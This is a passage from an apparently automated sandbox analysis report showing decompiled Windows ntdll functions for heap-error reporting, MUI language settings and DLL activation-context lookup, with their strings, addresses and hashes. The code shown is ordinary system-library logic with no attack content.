calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 1d8e9603aaccd2917a0011aa3a1295c81a0c6a4536cb5fcf1c09f4a3f09669f0
Instruction ID: bfe83b314bf26c7649a7873808a5d5c1c613460d15bc24c047eb6ab6aa1cb921
Opcode Fuzzy Hash: 1d8e9603aaccd2917a0011aa3a1295c81a0c6a4536cb5fcf1c09f4a3f09669f0
Instruction Fuzzy Hash: A381F3B9A00200FFDB26DE898C85EAF3F77AF46A55F4400D4F416AF222D361D551CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 03881C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E03881C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x37a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E037CB150();
				} else {
					E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x38b589c);
				E037CB150("Heap error detected at %p (heap handle %p)\n",  *0x38b58a0);
				_t27 =  *0x38b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03881E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E037CB150();
				} else {
					E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E037CB150("Error code: %d - %s\n",  *0x38b5898);
				_t113 =  *0x38b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E037CB150();
					} else {
						E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E037CB150("Parameter1: %p\n",  *0x38b58a4);
				}
				_t115 =  *0x38b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E037CB150();
					} else {
						E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E037CB150("Parameter2: %p\n",  *0x38b58a8);
				}
				_t117 =  *0x38b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E037CB150();
					} else {
						E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E037CB150("Parameter3: %p\n",  *0x38b58ac);
				}
				_t119 =  *0x38b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E037CB150();
					} else {
						E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x38b58b4);
					E037CB150("Last known valid blocks: before - %p, after - %p\n",  *0x38b58b0);
				} else {
					_t120 =  *0x38b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E037CB150();
				} else {
					E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E037CB150("Stack trace available at %p\n", 0x38b58c0);
			}

0x03881c10
0x03881c16
0x03881c1e
0x03881c3d
0x03881c3e
0x03881c20
0x03881c35
0x03881c3a
0x03881c44
0x03881c55
0x03881c5a
0x03881c65
0x03881c67
0x00000000
0x03881c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03881c67
0x03881cdc
0x03881ce5
0x03881d04
0x03881d05
0x03881ce7
0x03881cfc
0x03881d01
0x03881d0b
0x03881d17
0x03881d1f
0x03881d25
0x03881d30
0x03881d4f
0x03881d50
0x03881d32
0x03881d47
0x03881d4c
0x03881d61
0x03881d67
0x03881d68
0x03881d6e
0x03881d79
0x03881d98
0x03881d99
0x03881d7b
0x03881d90
0x03881d95
0x03881daa
0x03881db0
0x03881db1
0x03881db7
0x03881dc2
0x03881de1
0x03881de2
0x03881dc4
0x03881dd9
0x03881dde
0x03881df3
0x03881df9
0x03881dfa
0x03881e00
0x03881e0a
0x03881e13
0x03881e32
0x03881e33
0x03881e15
0x03881e2a
0x03881e2f
0x03881e39
0x03881e4a
0x03881e02
0x03881e02
0x03881e08
0x00000000
0x00000000
0x03881e08
0x03881e5b
0x03881e7a
0x03881e7b
0x03881e5d
0x03881e72
0x03881e77
0x03881e95

Strings

Parameter3: %p, xrefs: 03881DEE
Heap error detected at %p (heap handle %p), xrefs: 03881C50
heap_failure_cross_heap_operation, xrefs: 03881CC2
heap_failure_internal, xrefs: 03881C6E
heap_failure_usage_after_free, xrefs: 03881CBB
heap_failure_block_not_busy, xrefs: 03881CA6
Stack trace available at %p, xrefs: 03881E86
Last known valid blocks: before - %p, after - %p, xrefs: 03881E45
Parameter1: %p, xrefs: 03881D5C
heap_failure_listentry_corruption, xrefs: 03881CD0
heap_failure_freelists_corruption, xrefs: 03881CC9
Error code: %d - %s, xrefs: 03881D12
HEAP[%wZ]: , xrefs: 03881C30, 03881CF7, 03881D42, 03881D8B, 03881DD4, 03881E25, 03881E6D
heap_failure_buffer_overrun, xrefs: 03881C98
heap_failure_virtual_block_corruption, xrefs: 03881C91
Parameter2: %p, xrefs: 03881DA5
heap_failure_lfh_bitmap_mismatch, xrefs: 03881CD7
heap_failure_invalid_allocation_type, xrefs: 03881CB4
heap_failure_unknown, xrefs: 03881C75
heap_failure_generic, xrefs: 03881C7C
heap_failure_invalid_argument, xrefs: 03881CAD
HEAP: , xrefs: 03881C16, 03881C3D, 03881D04, 03881D4F, 03881D98, 03881DE1, 03881E32, 03881E7A
heap_failure_multiple_entries_corruption, xrefs: 03881C8A
heap_failure_entry_corruption, xrefs: 03881C83
heap_failure_buffer_underrun, xrefs: 03881C9F

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 6655a955da886352295f907e235c27cd459049758f0f8535fea9186e5091aed1
Instruction ID: 10648fc27ef876e5d22cea7e045687d092bcd837aab44ba7e88dd6896fe4f045
Opcode Fuzzy Hash: 6655a955da886352295f907e235c27cd459049758f0f8535fea9186e5091aed1
Instruction Fuzzy Hash: 05615636521A89DFD611F7C8E4CEF6573B5EB04A6470980BEF40B9F712DA349C42CA19

Uniqueness

Uniqueness Score: -1.00%

Function 037D3D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E037D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E037D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E037D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E037D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E037D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E037D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L037E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0380F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03811370(_t276, 0x37a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0380BB40(0,  &_v68, _t170);
									if(L037D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0380BB40(_t257,  &_v68, _t243);
								if(L037D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03811370(_t278, 0x37a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L037E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0380F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03811370(_v16, 0x37a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0380BB40(_t262,  &_v68, _t244);
								if(L037D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03811370(_t282, 0x37a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0380BB40(_t262,  &_v68, _t201);
							if(L037D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L037E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0380F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03811370(_t280, 0x37a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0380BB40(_t267,  &_v68, _t245);
							if(L037D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03811370(_t284, 0x37a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0380BB40(_t267,  &_v68, _t224);
						if(L037D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x037d3d3c
0x037d3d42
0x037d3d44
0x037d3d46
0x037d3d49
0x037d3d4c
0x037d3d4f
0x037d3d52
0x037d3d55
0x037d3d58
0x037d3d5b
0x037d3d5f
0x037d3d61
0x037d3d66
0x03828213
0x03828218
0x037d4085
0x037d4088
0x037d408e
0x037d4094
0x037d409a
0x037d40a0
0x037d40a6
0x037d40a9
0x037d40af
0x037d40b6
0x037d40bd
0x037d40bd
0x037d3d83
0x0382821f
0x03828229
0x03828238
0x03828238
0x0382823d
0x0382823d
0x037d3da0
0x037d3daf
0x037d3db5
0x037d3dba
0x037d3dba
0x037d3dd4
0x037d3e94
0x037d3eab
0x037d3f6d
0x037d3f84
0x037d406b
0x037d406b
0x037d406e
0x037d406e
0x037d4070
0x037d4074
0x03828351
0x03828351
0x037d407a
0x037d407f
0x0382835d
0x03828370
0x03828377
0x03828379
0x0382837c
0x0382837c
0x0382835d
0x00000000
0x037d407f
0x037d3f8a
0x037d3f8d
0x037d3f90
0x037d3f95
0x0382830d
0x0382830f
0x037d3f9b
0x037d3fac
0x037d3fae
0x037d3fb1
0x037d3fb1
0x037d3fb6
0x03828317
0x0382831a
0x00000000
0x037d3fbc
0x037d3fc1
0x037d3fc9
0x037d3fd7
0x037d3fda
0x037d3fdd
0x037d4021
0x037d4021
0x037d4029
0x037d4030
0x037d4044
0x037d4046
0x037d4046
0x037d4044
0x037d4049
0x03828327
0x03828334
0x03828339
0x0382833c
0x037d404f
0x037d404f
0x037d404f
0x037d4051
0x037d4056
0x037d4063
0x037d4063
0x037d4068
0x00000000
0x037d4068
0x037d3fdf
0x037d3fe2
0x037d3fe4
0x037d3fe7
0x037d3fef
0x037d4003
0x037d4005
0x037d4005
0x037d400c
0x037d4013
0x037d4016
0x037d4017
0x037d401b
0x037d401e
0x00000000
0x037d401e
0x037d3fb6
0x037d3eb1
0x037d3eb4
0x037d3eb7
0x037d3ebc
0x038282a9
0x038282ab
0x037d3ec2
0x037d3ed3
0x037d3ed5
0x037d3ed8
0x037d3ed8
0x037d3edd
0x038282b3
0x038282b6
0x00000000
0x037d3ee3
0x037d3ee8
0x037d3eed
0x037d3ef0
0x037d3ef3
0x037d3f02
0x037d3f05
0x037d3f08
0x038282c0
0x038282c3
0x038282c5
0x038282c8
0x038282d0
0x038282e4
0x038282e6
0x038282e6
0x038282ed
0x038282f4
0x038282f7
0x038282f8
0x038282fc
0x038282ff
0x038282ff
0x037d3f0e
0x037d3f11
0x037d3f16
0x037d3f1d
0x037d3f31
0x03828307
0x03828307
0x037d3f31
0x037d3f39
0x037d3f48
0x037d3f4d
0x037d3f50
0x037d3f50
0x037d3f53
0x037d3f58
0x037d3f65
0x037d3f65
0x037d3f6a
0x00000000
0x037d3f6a
0x037d3edd
0x037d3dda
0x037d3ddd
0x037d3de0
0x037d3de5
0x03828245
0x037d3deb
0x037d3df7
0x037d3dfc
0x037d3dfe
0x037d3e01
0x037d3e01
0x037d3e06
0x0382824d
0x0382824f
0x03828254
0x00000000
0x037d3e0c
0x037d3e11
0x037d3e16
0x037d3e19
0x037d3e29
0x037d3e2c
0x037d3e2f
0x0382825c
0x0382825f
0x03828261
0x03828264
0x0382826c
0x03828280
0x03828282
0x03828282
0x03828289
0x03828290
0x03828293
0x03828294
0x03828298
0x0382829b
0x0382829b
0x037d3e35
0x037d3e38
0x037d3e3d
0x037d3e44
0x037d3e58
0x038282a3
0x038282a3
0x037d3e58
0x037d3e60
0x037d3e6f
0x037d3e74
0x037d3e77
0x037d3e77
0x037d3e7a
0x037d3e7f
0x037d3e8c
0x037d3e8c
0x037d3e91
0x00000000
0x037d3e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 037D3E97
Kernel-MUI-Language-Allowed, xrefs: 037D3DC0
Kernel-MUI-Language-SKU, xrefs: 037D3F70
WindowsExcludedProcs, xrefs: 037D3D6F
Kernel-MUI-Number-Allowed, xrefs: 037D3D8C

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 95910082b004476454afa251cd7fbebf14dece42711457b91c8010cb88778d98
Instruction ID: 1f55971ddf9a00bbfa5b37fca320246be361de694937273a53282851c526cef7
Opcode Fuzzy Hash: 95910082b004476454afa251cd7fbebf14dece42711457b91c8010cb88778d98
Instruction Fuzzy Hash: 2DF13976D00618EFCF15DFE9D984AEEBBB9EF48650F1401AAE505EB250D7749E00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 037F8E00 Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E037F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x38bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x38b8464; // 0x772a0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x38b5780 & 0x00000003) != 0) {
							E03845510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x38b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0380B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x38b7984; // 0x31d3ea0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x38b8464; // 0x772a0110
					 *0x38bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E037F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x38b5780 & 0x00000005) != 0) {
						_push(_t49);
						E03845510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x037f8e0f
0x037f8e16
0x037f8e19
0x037f8e1b
0x037f8e21
0x037f8e7f
0x037f8e85
0x03839354
0x0383936c
0x03839371
0x0383937b
0x03839381
0x03839381
0x0383937b
0x037f8e9d
0x037f8e9d
0x037f8e29
0x037f8e2c
0x037f8e38
0x037f8e3e
0x037f8e43
0x037f8eb5
0x037f8eb9
0x038392aa
0x038392af
0x038392e8
0x038392e8
0x038392af
0x037f8eb9
0x037f8e45
0x037f8e53
0x037f8e5b
0x037f8e5f
0x037f8e78
0x037f8e78
0x037f8e7d
0x037f8ec3
0x037f8ecd
0x037f8ed2
0x037f8ed2
0x037f8ec5
0x037f8ec5
0x00000000
0x037f8e7d
0x037f8e67
0x037f8ea4
0x0383931a
0x00000000
0x00000000
0x03839320
0x037f8ea4
0x037f8e70
0x03839325
0x03839340
0x03839345
0x03839345
0x037f8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 03839357
minkernel\ntdll\ldrsnap.c, xrefs: 0383933B, 03839367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0383932A
LdrpFindDllActivationContext, xrefs: 03839331, 0383935D

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: c88cbdae036579338931738a30708aafb394131eff539d80ce92b401c11d470c
Instruction ID: f3ec1ad0b3891ad185afd61af91c33b20ada9d109cb86d8e9f5f0a21f992f25b
Opcode Fuzzy Hash: c88cbdae036579338931738a30708aafb394131eff539d80ce92b401c11d470c
Instruction Fuzzy Hash: 04411662A00715BFDB25EB588C48B79B7A8BB4125CF0E41E9EA1497351E7709D80C283

Uniqueness

Uniqueness Score: -1.00%

Function 037D8794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E037D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E037D934A() != 0) {
								_t159 = E0384A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x38b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03845510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x38b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E037D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
